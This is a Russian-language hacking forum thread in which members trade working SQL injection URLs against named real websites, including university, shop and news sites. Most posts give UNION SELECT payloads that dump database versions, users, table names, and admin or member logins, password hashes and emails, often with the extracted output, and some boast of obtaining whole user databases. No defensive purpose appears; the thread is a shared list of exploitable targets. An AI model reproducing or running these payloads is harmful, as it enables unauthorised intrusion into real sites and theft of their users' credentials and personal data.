SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    http://www.autoprava.ru/fototop/model.php?id=616%27+UNION+SELECT+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16+LIMIT+1,1+--+

    можно похакать девченку в гелике)
     
    1 person likes this.
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.echoes.org.uk/magazine.php?id=-358'+union+select+1,2,3,4,5+from+information_schema.tables+--+
    Code:
    http://pakistantimes.net/pt/detail.php?newsId=-1108+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
    Code:
    http://balicarholiday.com/daftar_tour.php?kategoriID=-2+uNIon+sELEct+1,2,tAble_name,4,5+from+information_schema.tables+--+
    Code:
    http://makeupartistindonesia.net/detail_event.php?eventID=-9418+uNIon+select+1,2,3,4,5,concat_ws(0x3a3a,name,password,is_private,email,peer,is_admin),7,8,9,10,11,12,13,14,15,16+from+users+--+&vendorID=11370418
    Code:
    http://www.stomp.it/default.php?idref=-81+union+select+1,concat_ws(0x3a3a,userid,paswid)+from+,4,5,6+from+admin+--+
    Code:
    http://www.matteite.com/en/matteite.php?idCat=51+union+select+1,concat_ws(0x3a3a,login,password),3,4,5,6+from+admin+--+
    Code:
    http://www.belmedpreparaty.com/prices/registr1.php?rub_id=-25+union+select+1,user()+--+&%F1ountry_id=1
    Code:
    http://www.namo.in.th/detail_product.php?productid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+namo_user_level+--+
    Code:
    http://www.cpacdsign.com/detail_product.php?productid=-119+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,mb_id,mb_login,mb_password,mb_email,mb_accept,mb_status,mb_surname,mb_education,mb_province),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+cpac_member+--+
    Code:
    http://www.cameroon-info.net/cin_rubriques.php?rub_id=-757+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+--+

    Code:
    http://www.italiepunt.nl/shop/new_index.php?adviceselection=-72+union+select+1,2+from+information_schema.tables+--+
    Code:
    http://www.johnraffertyphotography.com/gallery.php?view_image=141&view_category=-17+union+select+user()+--+&start_img=0
    Code:
    http://www.docteurclaude.fr/rubrique.php?RUB_ID=-4+union+select+1,2,3,4,5,6,7,8,9+/*+
    Code:
    http://bodyspace.net/artigos.php?rub_id=-138+union+select+1,2,3,4,concat_ws(0x3a3a,username,user_password,user_passchg,user_pass_convert,user_email,user_login_attempts,user_type,group_id,user_permissions,user_perm_from),6+from+forum2_users+limit+7,1+--+
    Code:
    http://www.e-boat.it/default.php?idref=36&ida=227+uNIon+sELect+1,2,3,4,5,6,7+--+
    Code:
    http://cube3.securesites.net/_ios_seacube/default.php?idref=19&ecom=11&ecomid=31+union+select+1,2,3,4,5,6,7,8,9+--+
    Code:
    http://www.gavazzeni.it/index.php?idref=420&mainid=431+union+select+1,2,3+--+&open=420&PHPSESSID=9946bcf29a0b0ad8d69799d3055b352a
    Code:
    http://www.leclaireurhebdo.com/rubrique.php?PAGE_ID=6&RUB_ID=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+--+
    Code:
    http://www.alice-miller.com/articles_en.php?lang=en&nid=-101+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+--+&grp=11
    Code:
    http://www.essaygifts.co.za/product-list.php?id=-43+union+select+1,2,3,4,5,6+from+information_schema.tables+--+
    Code:
    http://www.rsd-electronic.com/en/product-details.php?art=-4175+union+select+1,2,3,4,5,6,7+--+
    Code:
    http://www.energypluspumps.eu/en/cesky/product_lists/product-list.php?id=53+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+--+
    Code:
    http://depolamp.ru/buy.php?id=-13+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+--+&make=show
    Code:
    http://jtime.ru/buy.php?ID=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
    Code:
    http://www.wisedentist.com/d2d/browse.php?bcat=-6+union+select+1,username,password,4,5,6,7,8+from+admin+--+
     
    1 person likes this.
  3. viaman

    viaman New Member

    Joined:
    26 Nov 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    edu one

    http://www.educ.msstate.edu/events/detail.php?id=-669+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--
     
    1 person likes this.
  4. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    joomlaextensions.co.in PR-4

    Code:
    http://joomlaextensions.co.in/index.php?template=system&option=com_jeeventcalendar&view=event&Itemid=155&event_id=-1%22+UNION+ALL+SELECT+1,version%28%29,user%28%29,database%28%29,5,6,7,8+FROM+jos_users%23
    version:5.0.87-community
    database:joomlaex_joomextenstions
    user:joomlaex_jextens@localhost

    pescanova.com PR-5

    Code:
    http://www.pescanova.com/contenido.php?idmenu=40&id_noticia=6+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14+--+
    Code:
    5.0.33-log:[email protected]:BD276183005
     
  5. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.kai3fan.net/wiki/version.php?id=-4+union+select+1,2,3,4,group_concat(0x0b,column_name),6+from+information_schema.columns+where+table_name=0x6B61695F75736572
    kai_user::id,name,passwort,jobids,realname,time,rank,mail,lastvisit,signatur
    MySQL 5.0.26
    http://www.kai3fan.net/wiki/version.php?id=-4+union+select+1,2,3,4,group_concat(0x0b,id,0x3a,name,0x3a,passwort),6+from+kai_user+--
     
  6. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    PR: 6

    _http://physics.anu.edu.au/nuclear/personnel.php?id=(1,2)=(select*from(select+name_const((select+concat_ws(0x3a,version(),user())),1),name_const((select+concat_ws(0x3a,version(),user())),1))a)

    PR: 7

    _http://www.stat.washington.edu/people/people.php?id=-75+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10+--+
     
    3 people like this.
  7. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.script-php.info/index.php?link=9&id=-45+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database())
    database:yandexn_scripts@localhost
    version:5.0.67-community
    user:yandexn_scripts

    Code:
    http://runetbusiness.com//index.php?link=4&id=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database())
    database:yandexn_nn@localhost
    version:4.1.22-standard
    user:yandexn_runetbusiness
     
    #11367 Extremal, 1 Feb 2010
    Last edited: 1 Feb 2010
    1 person likes this.
  8. GTO

    GTO Member

    Joined:
    10 Dec 2007
    Messages:
    7
    Likes Received:
    10
    Reputations:
    0
    http://www.insk.ru/news_view.php?news_id=-15+union+select+1,concat(login,0x3a,passwd,0x3a,email),3+from+users+--+
    Вся база данных юзеров с емайлами :)

    http://www.paramountcenter.org/stage.php?id=-432+union+select+1,2,concat(name,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin+limit+1
     
    #11368 GTO, 2 Feb 2010
    Last edited: 2 Feb 2010
    1 person likes this.
  9. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    pescanova.it PR-2

    Code:
    http://www.pescanova.it/news.php?section=90&action=show&id=-27+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6+--+
    Code:
    4.1.20:admin_pescan@web010101:pescan
    oasibioresearchfoundation.org PR-2 Blind

    Code:
    http://www.oasibioresearchfoundation.org/index.php?patologia=11+and+substring%28version%28%29,1,1%29=4
     
  10. EndLeSSDre@M

    EndLeSSDre@M Banned

    Joined:
    18 Jul 2009
    Messages:
    142
    Likes Received:
    99
    Reputations:
    -5
    Code:
    http://www.lamongols.com/components/com_jcalpro/cal_popup.php?extmode=view&extid=9999'+union+select+1,2,concat(convert(name+using+latin1),0x3a,convert(password+using+latin1)),concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+--+
    version: 5.1.42
    user: anugaasc_lamon@localhost
    database: anugaasc_lamongols

    При запросе вежливо выдает имя и пасс админа в md5 + salt
     
    6 people like this.
  11. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    eDU-DU
    Version: 5.0.45
    User: [email protected]
     
    1 person likes this.
  12. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.chrisjordan.com/current_set2.php?id=11'+and+1=2+UNION+SELECT+1,2,3,4,5--+'
    
    database:cjordanwebdata
    version:4.1.22-max-log
    user:[email protected]
     
  13. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    Code:
    http://brunswickncyardsales.com/links.php?cat=-18/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--
    Code:
    http://www.dreamscity.net/dlil/links_showcat.php?id=3%20and%201=0%20UNION%20SELECT%201,concat(username,0x3a,password),3,4%20from%20admin
     
    #11373 SEWERN, 3 Feb 2010
    Last edited: 3 Feb 2010
    2 people like this.
  14. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    jenniferlynn.com PR-2

    Code:
    http://www.jenniferlynn.com/gig-guide/gigs?event_id=-27+union+select+%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
    Code:
    5.0.51a-24+lenny2-log:jlynn@localhost:jlynn
    highervibrationliving.com

    Code:
    http://highervibrationliving.com/wordpress/?page_id=19&event_id=-123+union+select+%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
    8
    Code:
    5.0.67.d7-ourdelta-log:[email protected]:hig0933807564279
     
  15. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    http://talismanov.net/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7+from+information_schema.tables--
    
    http://dedmorozov.net/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7+from+information_schema.tables--
    
    Два с одной базы
    Code:
    5.0.45:u15364@localhost
    
     
    1 person likes this.
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Я больше не буду баянить=)

    Code:
    http://www.isf-roma.org/page_index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    
    database:isfdb
    version:4.0.24_Debian-10-log
    user:isfanonymous@localhost
    
    Code:
    http://www.gripperbybauer.com/viewItem.php?id=-1+UNION+SELECT+1,2,3,4--
    
    database:grippers
    version:5.0.37-log
    user:grippers@localhost
    
    Code:
    http://www.kinkadegalleries.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:kinkad
    version:4.0.27-log
    user:kinkad@localhost
    
    Code:
    http://www.historicflyingclothing.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:hfcc
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://www.rzmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:rzmilitaria
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://www.regimentals.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    
    database:regimentals
    version:4.1.19
    user:[email protected]
    
    Code:
    http://www.theoldbrigade.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    
    database:theoldbrigade
    version:4.1.19
    user:[email protected]
    
    Code:
    http://www.hiscoll.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:hiscoll
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://www.bluebellmilitaria.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:bluebell
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://www.pastgloriesmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:pastglories
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://www.kinkadegalleries.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:kinkad
    version:4.0.27-log
    user:kinkad@localhost
    
    Code:
    http://www.regimentals.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    
    database:regimentals
    version:4.1.19
    user:[email protected]
    
    Code:
    http://www.homefrontcollection.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:homefront
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://glamourofpearls.com/site/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
    
    database:glamourofpearls_com
    version:4.0.27
    user:glamourofpearls@localhost
    
    Code:
    http://www.lastreich.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3--
    
    database:lastreich
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://www.adfmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
    
    database:adfmilitaria
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
    Code:
    http://mycommissionbid.com/bid/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
    
    database:mybid
    version:5.0.22-Debian_0ubuntu6.06.10-log
    user:[email protected]
    
     
    2 people like this.
  17. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Database Version: 5.0.51a-24+lenny2-log
    Database name: heelezTH
    User name: u_heelezTH@localhost
     
    1 person likes this.
  18. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Вот решил еще одну инъекцию ру сайта выложить
    user: [email protected]
    DataBase: u12625_postsov
    Version: 5.0.67-log
     
    1 person likes this.
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    RU shop's
    Одминко www.site/admin/
     
    _________________________
    4 people like this.
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://reviews.techloop.net/review.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,database(),29,user(),31,32,33,34,35,36,37,38,39,40,41+--+
    
    version: 5.0.67
    database: techloop_db
    user: techloop_db@localhost
     
Thread Status:
Not open for further replies.